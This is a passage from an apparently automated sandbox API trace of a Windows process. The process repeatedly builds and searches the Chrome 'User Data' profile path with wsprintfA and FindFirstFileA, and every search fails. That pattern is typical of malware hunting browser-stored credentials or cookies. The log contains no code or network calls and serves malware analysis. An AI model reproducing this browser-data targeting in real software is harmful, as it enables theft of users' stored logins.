ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.633] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.633] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.633] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.633] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.633] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.633] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.634] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.634] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.634] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.634] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.634] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.634] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.634] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.634] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.634] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.634] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.634] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.634] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.634] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.634] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.635] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.635] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.635] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.635] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.635] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.635] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.635] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.635] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.635] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.635] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.635] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.635] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.636] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.636] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.636] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.636] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.636] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.636] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.636] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.636] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.639] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.639] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.639] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.639] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.639] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.639] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.639] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.639] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.639] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.639] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.639] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.639] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.640] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.640] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.640] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.640] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.640] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.640] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.640] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.640] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.640] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.640] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: 